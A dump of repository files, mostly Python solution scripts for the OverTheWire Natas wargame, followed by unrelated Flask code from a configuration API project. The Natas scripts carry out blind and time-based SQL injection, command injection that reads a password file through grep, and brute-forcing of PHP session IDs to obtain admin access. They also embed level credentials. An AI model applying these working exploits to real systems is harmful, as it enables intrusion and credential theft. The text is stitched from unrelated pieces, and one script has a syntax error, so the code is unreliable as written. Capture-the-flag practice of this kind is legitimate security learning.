}\n}\n\n$showform = true;\nif(my_session_start()) {\n print_credentials();\n $showform = false;\n} else {\n if(array_key_exists(\"username\", $_REQUEST) && array_key_exists(\"password\", $_REQUEST)) {\n session_id(createID($_REQUEST[\"username\"]));\n session_start();\n $_SESSION[\"admin\"] = isValidAdminLogin();\n debug(\"New session started\");\n $showform = false;\n print_credentials();\n }\n} \n\nif($showform) {\n?> '''\n"
},
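The winning PHPSESSID in natas19.py is just the decimal counter joined to '-admin' and hex-encoded; the encoding step in isolation (Python 3, byte values following directly from ASCII):

    import binascii

    session = '281-admin'
    cookie = binascii.hexlify(session.encode('ascii')).decode('ascii')
    print(cookie)  # 3238312d61646d696e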
{
"alpha_fraction": 0.5633561611175537,
"alphanum_fraction": 0.5770547986030579,
"avg_line_length": 37.59321975708008,
"blob_id": "189ffb02dd2bce869f30432ecfcd498a77bfe0a9",
"content_id": "76333ae1dc9a7636decd680fccc9844b6483d5d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4675,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 118,
"path": "/natas17.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "''' \r\nSolution-Script for Natas17 - OverTheWire\r\n\r\nDaruma's_eye\r\n'''\r\nfrom string import ascii_letters\r\nfrom string import digits\r\nfrom time import sleep\r\nfrom time import time\r\nfrom requests import get # ==> per fare richieste get\r\nfrom urllib.parse import quote # ==> per fare codificare l'injection in codifica URL \r\nalpha_numeric = ascii_letters + digits\r\ndelay = 0.1\r\nsleep_sec = 1\r\n\r\n#Header delle richieste get, viene usato il campo Auth per accdere al sito tramite password,\r\n# il valore è un base64 dell'utente e della password\r\nheader={'Host' : 'natas17.natas.labs.overthewire.org'\\\r\n ,'Authorization': 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw=='}\r\n\r\n\r\n#Nella prima parte si applica la query { natas18\" and if(password like '___' , sleep(1), 0); # } \r\n# al campo username per stimare la lunghezza della password, si utlizza elapsed.seconds per\r\n# confrontarlo con il tempo dello sleep mysql nell'injection\r\nincomplete_injection = 'natas18\" and if(password like \\''\r\n\r\npassword_length = 0\r\nwhile True:\r\n\r\n password_length += 1\r\n incomplete_injection = incomplete_injection + '_'\r\n injection = incomplete_injection + '\\', sleep(' +str( sleep_sec )+ '), 0); # '\r\n print( 'Testing password of '+str( password_length )+' chars: with '+injection )\r\n \r\n injection = quote( injection,safe= '')\r\n url = 'http://natas17.natas.labs.overthewire.org/?username='+ injection\r\n \r\n req = get( url, headers= header ) \r\n\r\n #Potrebbe succedere che a causa di ritardi nella rete una richiesta impieghi più tempo del previsto\r\n # per sicurezza viene effettuata una seconda prova\r\n if( req.status_code == 200 ):\r\n if( req.elapsed.seconds >= sleep_sec ):\r\n \r\n print( 'Request produced http_code 200 in ' +str( req.elapsed.seconds )+ ' secs > ' +str( sleep_sec )+ '\\nRetesting in 1 sec...')\r\n sleep ( 1 )\r\n\r\n req = get( url , headers= header )\r\n if( req.elapsed.seconds >= sleep_sec ):\r\n break\r\n \r\n else:\r\n print('########## HTTP ERROR: ' +str( req.status_code )+ '##########\\nRetrying...')\r\n incomplete_injection = incomplete_injection[ 0:len( incomplete_injection )-1]\r\n\r\n sleep( delay )\r\n\r\nprint( 'It seems that the password is '+str( password_length )+' chars long.\\nWe can proceed with bruteforcing...' )\r\n\r\nsleep( 0.5 )\r\n\r\n\r\n#Nella seconda parte si si applica la query { natas18\" and if(password like '%' , sleep(1), 0); # } \r\n# come nella prima parte ma in questo caso si fa il bruteforcing carattere per carattere \r\npassword=''\r\ni=0\r\nwhile( i < password_length ):\r\n \r\n for char in alpha_numeric:\r\n \r\n print( 'Testing char '+ char +' for position '+ str(i) )\r\n injection = 'natas18\" and if(password like binary \\'' + password + char\r\n \r\n if( i!= password_length -1 ):\r\n injection = injection +'%'\r\n injection = injection +'\\', sleep(' +str( sleep_sec )+ '), 0); # ' \r\n print( 'Testing '+injection )\r\n\r\n injection = quote( injection,safe='' ) \r\n\t url = 'http://natas17.natas.labs.overthewire.org/?username=' +injection\r\n \r\n\t req = get( url, headers= header )\r\n\r\n\r\n if( req.status_code==200 ):\r\n if( req.elapsed.seconds >= sleep_sec ):\r\n\r\n #Potrebbe succedere che a causa di ritardi nella rete una richiesta impieghi più tempo del previsto\r\n # per sicurezza viene effettuata una seconda prova\r\n print( 'Request produced http_code 200 in ' +str( req.elapsed.seconds )+ ' secs > ' +str( sleep_sec )+ '\\nRetesting in 0.5 sec...' 
)\r\n sleep(.5)\r\n req = get( url, headers= header )\r\n if( req.elapsed.seconds >= sleep_sec ):\r\n password = password+char\r\n print( 'The char of position '+ str(i) +' is : '+ char )\r\n break\r\n \r\n\r\n #Nel caso in cui non si trova una corrispondenza finendo i caratteri a disposizione\r\n # si ipotizza che ci sia stato un problema con la richiesta e quindi si decrementa\r\n # la i per riprovare la posizione che ha fallito\r\n elif( char == '9' ):\r\n\r\n i-= 1\r\n break\r\n \r\n else:\r\n\r\n print( '########## HTTP ERROR: ' +str( req.status_code )+ '##########\\nRetrying...' )\r\n password = password[ 0:len( password )-1 ]\r\n i=i-1\r\n break\r\n\r\n sleep( delay )\r\n\r\n i+= 1\r\n\r\nprint( 'We have the password! Here it is: '+password )\r\n"
},
{
"alpha_fraction": 0.5921586155891418,
"alphanum_fraction": 0.652996838092804,
"avg_line_length": 39.345455169677734,
"blob_id": "08da414773a82dd89eb40abf3a2ce04e7ff4734e",
"content_id": "75d7af7c72dff27206668a4a9a110d7ac0e77e20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2219,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 55,
"path": "/natas16.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nfrom requests.auth import HTTPBasicAuth\nfrom string import ascii_lowercase\nfrom string import ascii_uppercase\nimport time\n\n# $(grep -v -E ^[[:alnum:]]{i}char(i)[[:alnum:]]{max-1-i}$)Africa\n\nchar_well = ascii_lowercase+ascii_uppercase+'0123456789'\nstrained_chars = '' \nsemaphore=0\nchar_num=0\nwhile(semaphore==0):\n char_num=char_num+1\n print('Doing: '+str(char_num))\n payload='%24%28grep+%2Dv+%2DE+%5E%5B%5B%3Aalnum%3A%5D%5D%7B'+str(char_num)+'%7D%24+%2Fetc%2Fnatas_webpass%2Fnatas17%29Africa'\n link='http://natas16.natas.labs.overthewire.org/?needle='+payload+'&submit=Search'\n head={'Host': 'natas16.natas.labs.overthewire.org'\\\n ,'Accept-Encoding': 'gzip, deflate'\\\n ,'DNT': '1'\\\n ,'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA=='}\n req = requests.get(link, headers=head)\n soup = BeautifulSoup(req.text, 'html.parser')\n search_output= soup.body.div.pre.string\n if(search_output!='\\n'):\n semaphore=1\n time.sleep(.300)\n\nprint('Seems that the password is '+str(char_num)+' chars long')\n\npassword=''\nfor i in range(char_num):\n for char in char_well: \n print('Doing: '+char+' of '+str(i))\n if(i==0):\n payload='%24%28grep+%2Dv+%2DE+%5E%5E%5B'+char+'%5D%5B%5B%3Aalnum%3A%5D%5D%7B'+str(char_num-1)+'%7D%24+%2Fetc%2Fnatas_webpass%2Fnatas17%29Africa'\n else:\n payload='%24%28grep+%2Dv+%2DE+%5E%5B%5B%3Aalnum%3A%5D%5D%7B'+str(i)+'%7D%5B'+char+'%5D%5B%5B%3Aalnum%3A%5D%5D%7B'+str(char_num-1-i)+'%7D%24+%2Fetc%2Fnatas_webpass%2Fnatas17%29Africa'\n\n link='http://natas16.natas.labs.overthewire.org/?needle='+payload+'&submit=Search'\n head={'Host': 'natas16.natas.labs.overthewire.org'\\\n ,'Accept-Encoding': 'gzip, deflate'\\\n ,'DNT': '1'\\\n ,'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA=='}\n req = requests.get(link, headers=head)\n soup = BeautifulSoup(req.text, 'html.parser')\n search_output= soup.body.div.pre.string\n if(search_output!='\\n'):\n print(char)\n password=password+char\n break\n time.sleep(.300)\n\nprint(password)\n"
},
{
"alpha_fraction": 0.6033464670181274,
"alphanum_fraction": 0.6141732335090637,
"avg_line_length": 32.85555648803711,
"blob_id": "9d5adbae0a99a86d8acc0f13951a000d59e5da0f",
"content_id": "a38c254adb8b3bdf798d8cafc8edca1ff21326bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3049,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 90,
"path": "/natas15.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "''' \nSolution-Script for Natas15 - OverTheWire\n\nDaruma's_eye\n'''\nfrom string import ascii_letters\nfrom string import digits\nfrom time import sleep\nfrom requests import get # ==> per fare richieste get \nfrom urllib.parse import quote # ==> per fare codificare l'injection in codifica URL\n\nalpha_numeric = ascii_letters + digits\ndelay = 0.1\n\n#Header delle richieste get, viene usato il campo Auth per accdere al sito tramite password,\n# il valore è un base64 dell'utente e della password\nheader={'Host' : 'natas15.natas.labs.overthewire.org'\\\n ,'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg'}\n\n\n\n#Nella prima parte si applica la query { natas16\" and password like '___' ; # } \n# al campo username per stimare la lunghezza della password, si controlla quindi se la risposta \n# contiene la stringa 'This user exists'\nincomplete_injection = 'natas16\" and password like \\''\n\npassword_length = 0\nwhile True:\n password_length += 1\n print( 'Testing password of '+str( password_length )+' chars' )\n incomplete_injection = incomplete_injection + '_'\n injection = incomplete_injection + '\\';# '\n \n injection = quote( injection,safe= ''\n url = 'http://natas15.natas.labs.overthewire.org/?username='+ injection\n \n req = get( url, headers= header )\n \n if 'This user exists.' in req.text:\n break\n\n elif 'This user doesn\\'t exist.' in req.text:\n print( 'This is not the right length...Incrementing...' )\n else:\n print( '########## GENERIC ERROR ##########' )\n exit(1)\n\n sleep( delay )\n\nprint( 'It seems that the password is '+str( password_length )+' chars long.\\nWe can proceed with bruteforcing...' )\n\nsleep( 0.5 )\n\n\n#Nella seconda parte si applica la query { natas16\" and password like ''; # } \n# come nella prima parte ma in questo caso si fa il bruteforcing carattere per carattere\npassword=''\nfor i in range( password_length ):\n\n for char in alpha_numeric:\n\n print( 'Testing char '+ char +' for position '+ str(i) )\n injection = 'natas16\" and password like binary \\'' + password + char\n \n if( i!=password_length-1 ):\n for j in range(password_length-i-1):\n injection = injection+'_'\n injection= injection+'\\';# ' \n print( 'Testing '+injection )\n\n injection = quote( injection,safe='' )\n\t url = 'http://natas15.natas.labs.overthewire.org/?username='+ injection \n \n req = get( url, headers= header )\n \n if 'This user exists.' in req.text:\n password = password+char\n print( 'The char of position '+ str(i) +' is : '+ char )\n break \n\n elif 'This user doesn\\'t exist.' in req.text:\n print( 'This is not the right char for this position...' )\n \n else:\n print( '########## GENERIC ERROR ##########' )\n exit(1)\n\n sleep( delay )\n\nprint( 'We have the password! Here it is: '+password )\n\n"
},
{
"alpha_fraction": 0.614829421043396,
"alphanum_fraction": 0.6318897604942322,
"avg_line_length": 39.105262756347656,
"blob_id": "67f5f987065c387eb58ade112f87e286fa45e8f7",
"content_id": "197dcdd579ba7f26f2a756bccd64a0487d1fb83a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1524,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 38,
"path": "/natas18.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom requests.auth import HTTPBasicAuth\nfrom time import sleep\nfrom bs4 import BeautifulSoup\n\n#The script makes the first request to natas18.natas.labs.overthewire.org, using username and password;\n#\n#It loops from 0 to MAX_PHPSSID (in this case 640), \n# for each loop it\n# - makes the request using the Auth field and the PHPSSID_cookie\n# - looks for \"you're an admin\" in the response body\n# - in this case break\n# - \n#Print the response of the last\n\nlink= 'http://natas18.natas.labs.overthewire.org?debug=1'\nreq = get(link, auth=HTTPBasicAuth('natas18','xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP'))\n\n\nfor cookie_payload in range(0,641):\n \n cookie_jar = {'PHPSESSID':str(cookie_payload)}\n req = get(link, cookies=cookie_jar, auth=HTTPBasicAuth('natas18','xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP'))\n if(req.status_code==200):\n soup = BeautifulSoup(req.text, 'html.parser')\n if 'You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.' in req.text:\n print('Cookie '+str(cookie_payload)+' is not a valid Admin Session')\n elif 'You are an admin. The credentials for the next level are' in req.text:\n print('Cookie '+str(cookie_payload)+' is a valid Admin Session!')\n print(soup.prettify())\n exit(0)\n else:\n print('####### Generic Error #######')\n print(soup.prettify())\n exit(1)\n else:\n print('######## HTTP ERROR: '+str(req.status_code)+'########\\nRetrying...')\n exit(1)\n"
}
] | 5 |
Mazzdev/Mazedev
|
https://github.com/Mazzdev/Mazedev
|
cd37125fa33295a1c316b6f50083016f174e158e
|
c5e74795474889ed7402bac478e0b2e93a0a4b7a
|
812eeaf4e2cd13cd9be84dc7d0840a9274d3aecd
|
refs/heads/master
| 2022-11-24T19:09:34.078748 | 2020-08-02T15:22:09 | 2020-08-02T15:22:09 | 267,849,254 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6559633016586304,
"alphanum_fraction": 0.6697247624397278,
"avg_line_length": 23.22222137451172,
"blob_id": "8489ad7d543290e84f5614478de10f5319884046",
"content_id": "d576fd4d56e49e2a366216b051b72c21aecdf811",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 9,
"path": "/main/urls.py",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom .views import home, portfolio, contact, success2\n\nurlpatterns = [\n path('', home),\n path('portfolio', portfolio),\n path('contact', contact),\n path('success2', success2),\n]\n"
},
{
"alpha_fraction": 0.6391304135322571,
"alphanum_fraction": 0.6417391300201416,
"avg_line_length": 30.94444465637207,
"blob_id": "de0f2cad98bf299d27e847864cd3c7c704fe9012",
"content_id": "86a90f8d2569abc24de6d9bed366064f1f394839",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1150,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 36,
"path": "/main/views.py",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "from django.core.mail import send_mail\nfrom django.http import HttpResponse, BadHeaderError\nfrom django.shortcuts import render\n\nfrom .forms import ContactForm\n\n\n# Create your views here.\n\ndef home(request):\n return render(request, 'main/about.html', {'title': 'about'})\n\n\ndef portfolio(request):\n return render(request, 'main/portfolio.html', {'title': 'portfolio'})\n\n\ndef success2(request):\n return render(request, 'main/success2.html', {'title': 'Thanks for your message'})\n\n\ndef contact(request):\n if request.method == 'GET':\n form = ContactForm()\n else:\n form = ContactForm(request.POST)\n if form.is_valid():\n subject = form.cleaned_data['subject']\n from_email = form.cleaned_data['from_email']\n message = form.cleaned_data['message']\n try:\n send_mail(subject, message, from_email, ['[email protected]'])\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n return render(request, 'main/success2.html', {'title': 'Thanks for your message'})\n return render(request, \"main/contact.html\", {'form': form})\n"
},
{
"alpha_fraction": 0.599552571773529,
"alphanum_fraction": 0.6017897129058838,
"avg_line_length": 30.928571701049805,
"blob_id": "5abe9ba80731b2eb663c6eef8129e2246fbe30d2",
"content_id": "3b4339d57a5840cbc7da6ec9f262662bc59c0f09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 306,
"num_lines": 28,
"path": "/templates/main/about.html",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "{% extends 'layout.html' %}\n{% load static %}\n\n{% block head %}\n\n{% endblock %}\n\n{% block content %}\n\n<div class=\"container\">\n <div class=\"profile-box\">\n <div class=\"about\">\n ABOUT ME\n </div>\n <div class=\"about-content\">\n My name is Dominik and I'm web developer.<br>\n I'm relatively young because I'm only 16. I started making pages recently.Besides programming, I like to play\n <a class=\"link\" href=\"https://eune.leagueoflegends.com/en-pl/how-to-play/\" target=\"_blank\">league</a>. I think I'm very sociable and it's not difficult to make new friends for me. My second passion is gym, I really like going there because I know that all the effort will pay off in the future.\n </div>\n <div class=\"profileimg\">\n </div>\n <hr>\n </div>\n <div class=\"content-box\">\n\n </div>\n</div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.703529417514801,
"alphanum_fraction": 0.7176470756530762,
"avg_line_length": 59.71428680419922,
"blob_id": "3e50c2062aed5a97ad5c653fcbf8a1435e7f0b73",
"content_id": "888bb95e04b5353dde03b611db11102830e47d43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 7,
"path": "/main/forms.py",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "from django import forms\n\n\nclass ContactForm(forms.Form):\n from_email = forms.EmailField(max_length=100, widget=forms.EmailInput(attrs={'placeholder': 'Your e-mail','class' : 'email'}))\n subject = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'placeholder': 'Subject','class' : 'subject'}))\n message = forms.CharField(widget=forms.Textarea(attrs={'placeholder': 'Your message','class' : 'message'}))\n"
},
{
"alpha_fraction": 0.56640625,
"alphanum_fraction": 0.58203125,
"avg_line_length": 15,
"blob_id": "b406b7d4bffbfc7a8b4bbbc14f40faa76ab5f140",
"content_id": "4103283b32a8953c554bddc2edc3ef0eb2533724",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 16,
"path": "/templates/main/portfolio.html",
"repo_name": "Mazzdev/Mazedev",
"src_encoding": "UTF-8",
"text": "{% extends 'layout.html' %}\n{% load static %}\n\n{% block head %}\n\n{% endblock %}\n\n{% block content %}\n\n<div class=\"container\">\n <h1 class=\"subtitle\">Portfolio</h1>\n <hr>\n <h2 class=\"illdosth\">If I do something, I'll add</h2>\n</div>\n\n{% endblock %}\n"
}
] | 5 |
ztj1993/config-api
|
https://github.com/ztj1993/config-api
|
6a025a057d2f780b84ce9d58687ff5391bed8dd6
|
bd6ba6313d9f5710339ebca06ee4b59e3d20dba3
|
fb6508712051655dbcf386b9b5e6f340ad5d9a79
|
refs/heads/master
| 2021-06-26T20:45:27.953148 | 2019-10-24T10:40:47 | 2019-10-25T01:34:24 | 216,966,269 | 3 | 0 |
MIT
| 2019-10-23T04:14:33 | 2019-12-11T03:27:14 | 2021-03-25T23:04:07 |
Python
|
[
{
"alpha_fraction": 0.6151832342147827,
"alphanum_fraction": 0.6178010702133179,
"avg_line_length": 12.642857551574707,
"blob_id": "32d41a4cc452ae8caf6346f6aab08c9a06b80698",
"content_id": "6d26a6bddde51bae06fbb863c8a6361faef348ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 28,
"path": "/App/Excepts.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 异常模块\n# Author: Ztj\n# Email: [email protected]\n\nclass ExceptionBase(Exception):\n \"\"\"基础异常\"\"\"\n pass\n\n\nclass CursorNotExist(ExceptionBase):\n \"\"\"游标不存在\"\"\"\n pass\n\n\nclass CursorExisting(ExceptionBase):\n \"\"\"游标已经存在\"\"\"\n pass\n\n\nclass KeyNotExist(ExceptionBase):\n \"\"\"键不存在\"\"\"\n pass\n\n\nclass RequestShort(ExceptionBase):\n \"\"\"缺少请求参数 Key\"\"\"\n pass\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6805555820465088,
"avg_line_length": 17,
"blob_id": "a78db6ae43e47996d0158e693fa031dfd5c0c53c",
"content_id": "982f1d56cfc385daa454800709db5c6367738ae9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 72,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "Flask==1.1.1\nPyYAML==5.1.2\npython-dotenv==0.10.3\npy-ztj-registry==0.0.2\n"
},
{
"alpha_fraction": 0.5971524119377136,
"alphanum_fraction": 0.6013400554656982,
"avg_line_length": 28.121952056884766,
"blob_id": "30ab8a1f16f1d2d60597a3f684034c4322ddd931",
"content_id": "330ec597b1caa64e9e37bc0a37412d75e8ede1bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1270,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 41,
"path": "/App/Libs.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 库模块\n# Author: Ztj\n# Email: [email protected]\n\nimport configparser\nfrom io import StringIO\n\nfrom dotenv import dotenv_values\n\n\ndef env_to_ini(env_str, prefix=None, delimiter='_', section_lower=False, key_lower=False):\n \"\"\"环境变量文本转 INI 文本\"\"\"\n ini_parser = configparser.ConfigParser()\n # 解析环境变量\n file_stream = StringIO(env_str)\n file_stream.seek(0)\n items = dotenv_values(stream=file_stream)\n for item in items:\n # 提取关键元素\n words = item.split(delimiter)\n if len(words) < 3:\n continue\n if prefix is not None:\n # 校验前缀\n item_prefix = words.pop(0)\n if not item_prefix == prefix:\n continue\n section = words.pop(0)\n key = delimiter.join(words)\n value = items.get(item)\n # 设置关键元素\n section = section.lower() if section_lower else section\n key = key.lower() if key_lower else key\n if not ini_parser.has_section(section):\n ini_parser.add_section(section)\n ini_parser.set(section, key, value)\n # 输出 INI 文本\n output_stream = StringIO()\n ini_parser.write(output_stream)\n return output_stream.getvalue()\n"
},
{
"alpha_fraction": 0.5804196000099182,
"alphanum_fraction": 0.6523476243019104,
"avg_line_length": 20.7608699798584,
"blob_id": "8f54b0fd8832b5acc4f9e025cb776caa81f252b4",
"content_id": "2f81fc0777154cfa8ba35d741de5ed6d00119f07",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1225,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 46,
"path": "/Docs/EnvToIni.md",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# 环境变量转 INI 配置接口\n\n## 应用示例\n```\n$ export FRP_COMMON_SERVER_ADDR=0.0.0.0\n$ export FRP_COMMON_BIND_PORT=7000\n$ export FRP_SSH_TYPE=tcp\n$ export FRP_SSH_LOCAL_IP=127.0.0.1\n$ export FRP_SSH_LOCAL_PORT=22\n$ export FRP_SSH_REMOTE_PORT=6000\n\n$ data=$(env | grep FRP) && echo \"${data}\"\n\n FRP_COMMON_SERVER_ADDR=0.0.0.0\n FRP_COMMON_BIND_PORT=7000\n FRP_SSH_TYPE=tcp\n FRP_SSH_LOCAL_IP=127.0.0.1\n FRP_SSH_LOCAL_PORT=22\n FRP_SSH_REMOTE_PORT=6000\n\n$ query_args=\"prefix=FRP&delimiter=_§ion_lower=1&key_lower=1\"\n$ curl -H \"Content-Type: text/plain\" http://127.0.0.1:5000/env_to_ini?${query_args} -d \"${data}\"\n\n [common]\n server_addr = 0.0.0.0\n bind_port = 7000\n\n [ssh]\n local_ip = 127.0.0.1\n remote_port = 6000\n local_port = 22\n type = tcp\n\n```\n\n## 接口文档\n- 接口路径:/env_to_ini\n- 返回数据:INI 配置文件文本\n\n参数名|类型|必填|说明\n---|---|---|---\nprefix|query|否|前缀,只处理指定前缀的环境变量\ndelimiter|query|否|分隔符,默认下划线,用于分割前缀、配置组和配置键\nsection_lower|query|否|配置组是否转为小写\nkey_lower|query|否|配置键是否转为小写\n-|data|是|环境变量文本数据\n"
},
{
"alpha_fraction": 0.6256157755851746,
"alphanum_fraction": 0.6995074152946472,
"avg_line_length": 12.533333778381348,
"blob_id": "9340cb499aedf47cc9962f946a3531511ef977b2",
"content_id": "bea5b7f8122f380c1489ded61ad33940fb5222ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 203,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 15,
"path": "/Dockerfile",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "FROM python:3.7-alpine\n\nENV FLASK_HOST=0.0.0.0\nENV FLASK_PORT=5000\nENV FLASK_DEBUG=0\n\nEXPOSE 5000\n\nWORKDIR /app\n\nCOPY . .\n\nRUN pip install --no-cache-dir -r requirements.txt\n\nCMD [ \"python\", \"main.py\" ]\n"
},
{
"alpha_fraction": 0.5870348215103149,
"alphanum_fraction": 0.5902360677719116,
"avg_line_length": 28.05813980102539,
"blob_id": "1ca5d3680acd755d88059f2ab172bf7c7afe0b99",
"content_id": "1726e6116bbc13e03fc386b126b1364991b552e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2659,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 86,
"path": "/App/MemoryData.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 内存数据模块\n# Author: Ztj\n# Email: [email protected]\n\nimport math\n\nfrom .Env import *\n\n\nclass MemoryData:\n \"\"\"内存数据对象\"\"\"\n CursorData = dict()\n ExpireData = dict()\n expire_key_divisor = 60\n\n @staticmethod\n def get_cursor_id():\n \"\"\"获取游标编号\"\"\"\n return uuid.uuid4().int\n\n def init_cursor(self, delimiter='.') -> int:\n \"\"\"初始化游标\"\"\"\n cursor_id = self.get_cursor_id()\n cursor_target = registry.Registry()\n cursor_target.separator = delimiter\n rs_target = self.CursorData.setdefault(cursor_id, cursor_target)\n if not cursor_target == rs_target:\n raise Excepts.CursorExisting()\n return cursor_id\n\n def get_cursor_target(self, cursor_id) -> registry.Registry:\n \"\"\"获取游标对象\"\"\"\n cursor_target = self.CursorData.get(cursor_id)\n if not isinstance(cursor_target, registry.Registry):\n raise Excepts.CursorNotExist()\n return cursor_target\n\n def delete_cursor(self, cursor_id):\n \"\"\"删除游标\"\"\"\n return self.CursorData.pop(cursor_id, False)\n\n def store_expire_key(self, expire_time):\n \"\"\"存储有效期键\"\"\"\n return math.ceil(expire_time / self.expire_key_divisor)\n\n def delete_expire_key(self, expire_time):\n \"\"\"删除有效期键\"\"\"\n return int(expire_time / self.expire_key_divisor)\n\n def init_expire(self, expire_time):\n \"\"\"初始化有效期\"\"\"\n key = self.store_expire_key(expire_time)\n self.ExpireData.setdefault(key, list())\n\n def set_cursor_expire(self, cursor_id, expire=300):\n \"\"\"设置游标有效期\"\"\"\n cur_time = int(time.time())\n expire_time = cur_time + expire\n self.init_expire(expire_time)\n self.get_expire(expire_time).append(cursor_id)\n\n def get_expire(self, expire_time) -> list:\n \"\"\"获取有效期列表\"\"\"\n key = self.store_expire_key(expire_time)\n return self.ExpireData.get(key)\n\n def pop_expire(self, expire_time) -> list:\n \"\"\"弹出有效期\"\"\"\n key = self.delete_expire_key(expire_time)\n return self.ExpireData.pop(key, False)\n\n def clear(self, clear_time):\n \"\"\"清理内存\"\"\"\n cursor_ids = self.pop_expire(int(clear_time))\n if cursor_ids is False:\n return False\n for cursor_id in cursor_ids:\n self.delete_cursor(cursor_id)\n return True\n\n def clear_listen(self):\n \"\"\"清理内存监听\"\"\"\n while True:\n self.clear(int(time.time()))\n time.sleep(self.expire_key_divisor / 2)\n"
},
{
"alpha_fraction": 0.6146010160446167,
"alphanum_fraction": 0.6196944117546082,
"avg_line_length": 23.54166603088379,
"blob_id": "2f95807a3f354c9ce5c7dec91316f82b2da724c7",
"content_id": "b5adf4fb072ffed74a866c5c7f81744c80407642",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 635,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 24,
"path": "/App/ApiMonitor.py",
"repo_name": "ztj1993/config-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Intro: 监控接口模块\n# Author: Ztj\n# Email: [email protected]\n\nfrom .Env import *\n\nMonitorBlueprint = flask.Blueprint('ApiMonitor', __name__, url_prefix='/monitor')\n\n\nclass ApiMonitor:\n \"\"\"监控接口\"\"\"\n\n @staticmethod\n @MonitorBlueprint.route('/cursors', methods=['GET', 'POST'])\n def cursors():\n \"\"\"获取内存游标键\"\"\"\n return json.dumps(list(MemoryData.CursorData.keys()), indent=4)\n\n @staticmethod\n @MonitorBlueprint.route('/expires', methods=['GET', 'POST'])\n def expires():\n \"\"\"获取失效数据\"\"\"\n return json.dumps(MemoryData.ExpireData, indent=4)\n"
},
{
"alpha_fraction": 0.6524437665939331,
"alphanum_fraction": 0.6741660237312317,
"avg_line_length": 23.788461685180664,
"blob_id": "69c834ad345aeae55c9c9128f57083037720b83f",
"content_id": "1b106cb32e2ab6408ff5eedce3be62705cc49aed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1397,
